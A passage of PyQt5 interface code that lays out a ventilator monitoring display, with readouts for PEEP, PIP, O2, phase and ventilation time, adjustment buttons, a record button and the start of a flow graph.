QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.stat_window_HL.addItem(spacerItem3)\r\n self.stat_col2 = QtWidgets.QWidget(self.stat_window)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_col2.sizePolicy().hasHeightForWidth())\r\n self.stat_col2.setSizePolicy(sizePolicy)\r\n self.stat_col2.setObjectName(\"stat_col2\")\r\n self.stat_col2_VL = QtWidgets.QVBoxLayout(self.stat_col2)\r\n self.stat_col2_VL.setObjectName(\"stat_col2_VL\")\r\n self.PEEP_value = QtWidgets.QLabel(self.stat_col2)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.PEEP_value.sizePolicy().hasHeightForWidth())\r\n self.PEEP_value.setSizePolicy(sizePolicy)\r\n self.PEEP_value.setMaximumSize(QtCore.QSize(16777215, 75))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(60)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.PEEP_value.setFont(font)\r\n self.PEEP_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.PEEP_value.setObjectName(\"PEEP_value\")\r\n self.stat_col2_VL.addWidget(self.PEEP_value)\r\n self.PEEP_label = QtWidgets.QLabel(self.stat_col2)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.PEEP_label.sizePolicy().hasHeightForWidth())\r\n self.PEEP_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.PEEP_label.setFont(font)\r\n self.PEEP_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.PEEP_label.setObjectName(\"PEEP_label\")\r\n 
self.stat_col2_VL.addWidget(self.PEEP_label)\r\n self.stat_col2_sub = QtWidgets.QWidget(self.stat_col2)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_col2_sub.sizePolicy().hasHeightForWidth())\r\n self.stat_col2_sub.setSizePolicy(sizePolicy)\r\n self.stat_col2_sub.setObjectName(\"stat_col2_sub\")\r\n self.stat_col1_sub_GL_2 = QtWidgets.QGridLayout(self.stat_col2_sub)\r\n self.stat_col1_sub_GL_2.setObjectName(\"stat_col1_sub_GL_2\")\r\n self.sPEEP_value = QtWidgets.QLabel(self.stat_col2_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.sPEEP_value.sizePolicy().hasHeightForWidth())\r\n self.sPEEP_value.setSizePolicy(sizePolicy)\r\n self.sPEEP_value.setMaximumSize(QtCore.QSize(16777215, 60))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(40)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.sPEEP_value.setFont(font)\r\n self.sPEEP_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.sPEEP_value.setObjectName(\"sPEEP_value\")\r\n self.stat_col1_sub_GL_2.addWidget(self.sPEEP_value, 0, 1, 1, 1)\r\n self.sPEEP_button_neg = QtWidgets.QPushButton(self.stat_col2_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.sPEEP_button_neg.sizePolicy().hasHeightForWidth())\r\n self.sPEEP_button_neg.setSizePolicy(sizePolicy)\r\n self.sPEEP_button_neg.setMinimumSize(QtCore.QSize(40, 40))\r\n self.sPEEP_button_neg.setMaximumSize(QtCore.QSize(40, 40))\r\n self.sPEEP_button_neg.setStyleSheet(\"background-color: rgb(31, 142, 250);\\n\"\r\n \"font: 18pt \\\"MS Shell Dlg 2\\\";\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 8px;\")\r\n self.sPEEP_button_neg.setObjectName(\"sPEEP_button_neg\")\r\n self.sPEEP_button_neg.clicked.connect(\r\n partial(self.sPEEP_button_clicked, False))\r\n self.stat_col1_sub_GL_2.addWidget(self.sPEEP_button_neg, 0, 0, 1, 1)\r\n self.sPEEP_button_pos = QtWidgets.QPushButton(self.stat_col2_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.sPEEP_button_pos.sizePolicy().hasHeightForWidth())\r\n self.sPEEP_button_pos.setSizePolicy(sizePolicy)\r\n self.sPEEP_button_pos.setMinimumSize(QtCore.QSize(40, 40))\r\n self.sPEEP_button_pos.setMaximumSize(QtCore.QSize(40, 40))\r\n self.sPEEP_button_pos.setStyleSheet(\"background-color: rgb(31, 142, 250);\\n\"\r\n \"font: 18pt \\\"MS Shell Dlg 2\\\";\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 8px;\")\r\n self.sPEEP_button_pos.setObjectName(\"sPEEP_button_pos\")\r\n self.sPEEP_button_pos.clicked.connect(\r\n partial(self.sPEEP_button_clicked, True))\r\n self.stat_col1_sub_GL_2.addWidget(self.sPEEP_button_pos, 0, 2, 1, 1)\r\n self.sPEEP_label = QtWidgets.QLabel(self.stat_col2_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n 
sizePolicy.setHeightForWidth(\r\n self.sPEEP_label.sizePolicy().hasHeightForWidth())\r\n self.sPEEP_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.sPEEP_label.setFont(font)\r\n self.sPEEP_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.sPEEP_label.setObjectName(\"sPEEP_label\")\r\n self.stat_col1_sub_GL_2.addWidget(self.sPEEP_label, 1, 0, 1, 3)\r\n self.stat_col2_VL.addWidget(self.stat_col2_sub)\r\n self.stat_window_HL.addWidget(self.stat_col2)\r\n spacerItem4 = QtWidgets.QSpacerItem(\r\n 16, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.stat_window_HL.addItem(spacerItem4)\r\n self.stat_col3 = QtWidgets.QWidget(self.stat_window)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_col3.sizePolicy().hasHeightForWidth())\r\n self.stat_col3.setSizePolicy(sizePolicy)\r\n self.stat_col3.setObjectName(\"stat_col3\")\r\n self.stat_col3_VL = QtWidgets.QVBoxLayout(self.stat_col3)\r\n self.stat_col3_VL.setObjectName(\"stat_col3_VL\")\r\n self.PIP_value = QtWidgets.QLabel(self.stat_col3)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.PIP_value.sizePolicy().hasHeightForWidth())\r\n self.PIP_value.setSizePolicy(sizePolicy)\r\n self.PIP_value.setMaximumSize(QtCore.QSize(16777215, 75))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(60)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.PIP_value.setFont(font)\r\n self.PIP_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.PIP_value.setObjectName(\"PIP_value\")\r\n self.stat_col3_VL.addWidget(self.PIP_value)\r\n self.PIP_label = QtWidgets.QLabel(self.stat_col3)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.PIP_label.sizePolicy().hasHeightForWidth())\r\n self.PIP_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.PIP_label.setFont(font)\r\n self.PIP_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.PIP_label.setObjectName(\"PIP_label\")\r\n self.stat_col3_VL.addWidget(self.PIP_label)\r\n self.stat_col3_sub = QtWidgets.QWidget(self.stat_col3)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_col3_sub.sizePolicy().hasHeightForWidth())\r\n self.stat_col3_sub.setSizePolicy(sizePolicy)\r\n self.stat_col3_sub.setObjectName(\"stat_col3_sub\")\r\n self.stat_col1_sub_GL_3 = QtWidgets.QGridLayout(self.stat_col3_sub)\r\n self.stat_col1_sub_GL_3.setObjectName(\"stat_col1_sub_GL_3\")\r\n self.sPIP_value = QtWidgets.QLabel(self.stat_col3_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n 
sizePolicy.setHeightForWidth(\r\n self.sPIP_value.sizePolicy().hasHeightForWidth())\r\n self.sPIP_value.setSizePolicy(sizePolicy)\r\n self.sPIP_value.setMaximumSize(QtCore.QSize(16777215, 60))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(40)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.sPIP_value.setFont(font)\r\n self.sPIP_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.sPIP_value.setObjectName(\"sPIP_value\")\r\n self.stat_col1_sub_GL_3.addWidget(self.sPIP_value, 0, 1, 1, 1)\r\n self.sPIP_button_neg = QtWidgets.QPushButton(self.stat_col3_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.sPIP_button_neg.sizePolicy().hasHeightForWidth())\r\n self.sPIP_button_neg.setSizePolicy(sizePolicy)\r\n self.sPIP_button_neg.setMinimumSize(QtCore.QSize(40, 40))\r\n self.sPIP_button_neg.setMaximumSize(QtCore.QSize(40, 40))\r\n self.sPIP_button_neg.setStyleSheet(\"background-color: rgb(31, 142, 250);\\n\"\r\n \"font: 18pt \\\"MS Shell Dlg 2\\\";\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 8px;\")\r\n self.sPIP_button_neg.setObjectName(\"sPIP_button_neg\")\r\n self.sPIP_button_neg.clicked.connect(\r\n partial(self.sPIP_button_clicked, False))\r\n self.stat_col1_sub_GL_3.addWidget(self.sPIP_button_neg, 0, 0, 1, 1)\r\n self.sPIP_button_pos = QtWidgets.QPushButton(self.stat_col3_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.sPIP_button_pos.sizePolicy().hasHeightForWidth())\r\n self.sPIP_button_pos.setSizePolicy(sizePolicy)\r\n self.sPIP_button_pos.setMinimumSize(QtCore.QSize(40, 40))\r\n self.sPIP_button_pos.setMaximumSize(QtCore.QSize(40, 40))\r\n self.sPIP_button_pos.setStyleSheet(\"background-color: rgb(31, 142, 250);\\n\"\r\n \"font: 18pt \\\"MS Shell Dlg 2\\\";\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 8px;\")\r\n self.sPIP_button_pos.setObjectName(\"sPIP_button_pos\")\r\n self.sPIP_button_pos.clicked.connect(\r\n partial(self.sPIP_button_clicked, True))\r\n self.stat_col1_sub_GL_3.addWidget(self.sPIP_button_pos, 0, 2, 1, 1)\r\n self.sPIP_label = QtWidgets.QLabel(self.stat_col3_sub)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.sPIP_label.sizePolicy().hasHeightForWidth())\r\n self.sPIP_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.sPIP_label.setFont(font)\r\n self.sPIP_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.sPIP_label.setObjectName(\"sPIP_label\")\r\n self.stat_col1_sub_GL_3.addWidget(self.sPIP_label, 1, 0, 1, 3)\r\n self.stat_col3_VL.addWidget(self.stat_col3_sub)\r\n self.stat_window_HL.addWidget(self.stat_col3)\r\n spacerItem5 = QtWidgets.QSpacerItem(\r\n 16, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.stat_window_HL.addItem(spacerItem5)\r\n self.stat_col4 = QtWidgets.QWidget(self.stat_window)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n 
sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_col4.sizePolicy().hasHeightForWidth())\r\n self.stat_col4.setSizePolicy(sizePolicy)\r\n self.stat_col4.setObjectName(\"stat_col4\")\r\n self.stat_col2_VL_2 = QtWidgets.QVBoxLayout(self.stat_col4)\r\n self.stat_col2_VL_2.setObjectName(\"stat_col2_VL_2\")\r\n self.O2_value = QtWidgets.QLabel(self.stat_col4)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.O2_value.sizePolicy().hasHeightForWidth())\r\n self.O2_value.setSizePolicy(sizePolicy)\r\n self.O2_value.setMaximumSize(QtCore.QSize(16777215, 75))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(60)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.O2_value.setFont(font)\r\n self.O2_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.O2_value.setObjectName(\"O2_value\")\r\n self.stat_col2_VL_2.addWidget(self.O2_value)\r\n self.O2_label = QtWidgets.QLabel(self.stat_col4)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.O2_label.sizePolicy().hasHeightForWidth())\r\n self.O2_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.O2_label.setFont(font)\r\n self.O2_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.O2_label.setObjectName(\"O2_label\")\r\n self.stat_col2_VL_2.addWidget(self.O2_label)\r\n self.stat_col3_sub_3 = QtWidgets.QWidget(self.stat_col4)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.stat_col3_sub_3.sizePolicy().hasHeightForWidth())\r\n self.stat_col3_sub_3.setSizePolicy(sizePolicy)\r\n self.stat_col3_sub_3.setObjectName(\"stat_col3_sub_3\")\r\n self.stat_col1_sub_GL_4 = QtWidgets.QGridLayout(self.stat_col3_sub_3)\r\n self.stat_col1_sub_GL_4.setObjectName(\"stat_col1_sub_GL_4\")\r\n self.PHASE_value = QtWidgets.QLabel(self.stat_col3_sub_3)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Minimum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.PHASE_value.sizePolicy().hasHeightForWidth())\r\n self.PHASE_value.setSizePolicy(sizePolicy)\r\n self.PHASE_value.setMaximumSize(QtCore.QSize(16777215, 60))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(40)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.PHASE_value.setFont(font)\r\n self.PHASE_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.PHASE_value.setObjectName(\"PHASE_value\")\r\n self.stat_col1_sub_GL_4.addWidget(self.PHASE_value, 0, 1, 1, 1)\r\n self.PHASE_label = QtWidgets.QLabel(self.stat_col3_sub_3)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.PHASE_label.sizePolicy().hasHeightForWidth())\r\n 
self.PHASE_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.PHASE_label.setFont(font)\r\n self.PHASE_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.PHASE_label.setObjectName(\"PHASE_label\")\r\n self.stat_col1_sub_GL_4.addWidget(self.PHASE_label, 1, 0, 1, 3)\r\n self.stat_col2_VL_2.addWidget(self.stat_col3_sub_3)\r\n self.stat_window_HL.addWidget(self.stat_col4)\r\n self.stat_widget_HL.addWidget(self.stat_window)\r\n spacerItem6 = QtWidgets.QSpacerItem(\r\n 16, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.stat_widget_HL.addItem(spacerItem6)\r\n self.time_widget = QtWidgets.QWidget(self.stat_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.time_widget.sizePolicy().hasHeightForWidth())\r\n self.time_widget.setSizePolicy(sizePolicy)\r\n self.time_widget.setMinimumSize(QtCore.QSize(320, 0))\r\n self.time_widget.setMaximumSize(QtCore.QSize(320, 16777215))\r\n self.time_widget.setStyleSheet(\"background-color: rgb(33, 43, 68);\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 16px;\\n\"\r\n \"\")\r\n self.time_widget.setObjectName(\"time_widget\")\r\n self.time_widget_VL = QtWidgets.QVBoxLayout(self.time_widget)\r\n self.time_widget_VL.setObjectName(\"time_widget_VL\")\r\n self.time_value = QtWidgets.QLabel(self.time_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.time_value.sizePolicy().hasHeightForWidth())\r\n self.time_value.setSizePolicy(sizePolicy)\r\n self.time_value.setMaximumSize(QtCore.QSize(16777215, 75))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(44)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.time_value.setFont(font)\r\n self.time_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.time_value.setObjectName(\"time_value\")\r\n self.time_widget_VL.addWidget(self.time_value)\r\n self.time_label = QtWidgets.QLabel(self.time_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.time_label.sizePolicy().hasHeightForWidth())\r\n self.time_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.time_label.setFont(font)\r\n self.time_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.time_label.setObjectName(\"time_label\")\r\n self.time_widget_VL.addWidget(self.time_label)\r\n self.vent_time_widget = QtWidgets.QWidget(self.time_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.vent_time_widget.sizePolicy().hasHeightForWidth())\r\n self.vent_time_widget.setSizePolicy(sizePolicy)\r\n self.vent_time_widget.setMaximumSize(QtCore.QSize(16777215, 75))\r\n self.vent_time_widget.setObjectName(\"vent_time_widget\")\r\n 
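# This row pairs the elapsed-ventilation readout with the circular record toggle wired up below.\r\n 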
self.vent_time_widget_HL = QtWidgets.QHBoxLayout(self.vent_time_widget)\r\n self.vent_time_widget_HL.setObjectName(\"vent_time_widget_HL\")\r\n self.vent_time_value = QtWidgets.QLabel(self.vent_time_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.vent_time_value.sizePolicy().hasHeightForWidth())\r\n self.vent_time_value.setSizePolicy(sizePolicy)\r\n self.vent_time_value.setMinimumSize(QtCore.QSize(0, 0))\r\n self.vent_time_value.setMaximumSize(QtCore.QSize(16777215, 75))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(44)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.vent_time_value.setFont(font)\r\n self.vent_time_value.setAlignment(QtCore.Qt.AlignCenter)\r\n self.vent_time_value.setObjectName(\"vent_time_value\")\r\n self.vent_time_widget_HL.addWidget(self.vent_time_value)\r\n self.record_button = QtWidgets.QPushButton(self.vent_time_widget)\r\n self.record_button.setEnabled(True)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.record_button.sizePolicy().hasHeightForWidth())\r\n self.record_button.setSizePolicy(sizePolicy)\r\n self.record_button.setMinimumSize(QtCore.QSize(50, 50))\r\n self.record_button.setMaximumSize(QtCore.QSize(50, 50)) # match the minimum so border-radius:25px stays a circle\r\n self.record_button.setStyleSheet(\"background-color: rgb(255, 0, 0);\\n\"\r\n \"font: 18pt \\\"MS Shell Dlg 2\\\";\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius:25px;\\n\"\r\n \"\")\r\n self.record_button.setObjectName(\"record_button\")\r\n \r\n self.record_button.clicked.connect(\r\n partial(self.recordButtonClicked))\r\n \r\n self.vent_time_widget_HL.addWidget(self.record_button)\r\n self.time_widget_VL.addWidget(self.vent_time_widget)\r\n self.vent_time_label = QtWidgets.QLabel(self.time_widget)\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Maximum)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.vent_time_label.sizePolicy().hasHeightForWidth())\r\n self.vent_time_label.setSizePolicy(sizePolicy)\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(16)\r\n font.setBold(True)\r\n font.setWeight(75)\r\n self.vent_time_label.setFont(font)\r\n self.vent_time_label.setAlignment(QtCore.Qt.AlignCenter)\r\n self.vent_time_label.setObjectName(\"vent_time_label\")\r\n self.time_widget_VL.addWidget(self.vent_time_label)\r\n self.stat_widget_HL.addWidget(self.time_widget)\r\n spacerItem7 = QtWidgets.QSpacerItem(\r\n 40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\r\n self.stat_widget_HL.addItem(spacerItem7)\r\n self.centralWidget_VL.addWidget(self.stat_widget)\r\n\r\n # Graph 1: Inspiratory Flow Rate\r\n def setupGraph1(self):\r\n self.graph1_widget = QtWidgets.QWidget(self.centralWidget)\r\n self.graph1_widget.setObjectName(\"graph1_widget\")\r\n self.graph1_widget_HL = QtWidgets.QHBoxLayout(\r\n self.graph1_widget)\r\n self.graph1_widget_HL.setObjectName(\"graph1_widget_HL\")\r\n self.graph1_label_widget = QtWidgets.QWidget(\r\n self.graph1_widget)\r\n\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Maximum, 
QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph1_label_widget.sizePolicy().hasHeightForWidth())\r\n self.graph1_label_widget.setSizePolicy(sizePolicy)\r\n\r\n self.graph1_label_widget.setStyleSheet(\"background-color: rgb(33, 43, 68);\\n\"\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"border-radius: 16px;\")\r\n self.graph1_label_widget.setObjectName(\"graph1_label_widget\")\r\n self.graph1_label_widget_HL = QtWidgets.QHBoxLayout(\r\n self.graph1_label_widget)\r\n self.graph1_label_widget_HL.setObjectName(\r\n \"graph1_label_widget_HL\")\r\n spacerItem8 = QtWidgets.QSpacerItem(\r\n 8, 20, QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Minimum)\r\n self.graph1_label_widget_HL.addItem(spacerItem8)\r\n self.graph1_label = QtWidgets.QLabel(self.graph1_label_widget)\r\n\r\n sizePolicy = QtWidgets.QSizePolicy(\r\n QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(\r\n self.graph1_label.sizePolicy().hasHeightForWidth())\r\n self.graph1_label.setSizePolicy(sizePolicy)\r\n\r\n self.graph1_label.setMinimumSize(QtCore.QSize(75, 0))\r\n self.graph1_label.setMaximumSize(QtCore.QSize(75, 16777215))\r\n\r\n font = QtGui.QFont()\r\n font.setFamily(\"Barlow SemiBold\")\r\n font.setPointSize(20)\r\n font.setBold(True)\r\n font.setWeight(60)\r\n self.graph1_label.setFont(font)\r\n\r\n self.graph1_label.setAlignment(\r\n QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignTop)\r\n self.graph1_label.setObjectName(\"graph1_label\")\r\n self.graph1_label_widget_HL.addWidget(self.graph1_label)\r\n self.graph1_value_widget = QtWidgets.QWidget(\r\n self.graph1_label_widget)\r\n self.graph1_value_widget.setMinimumSize(QtCore.QSize(100, 0))\r\n self.graph1_value_widget.setObjectName(\"graph1_value_widget\")\r\n self.graph1_value_widget_VL = 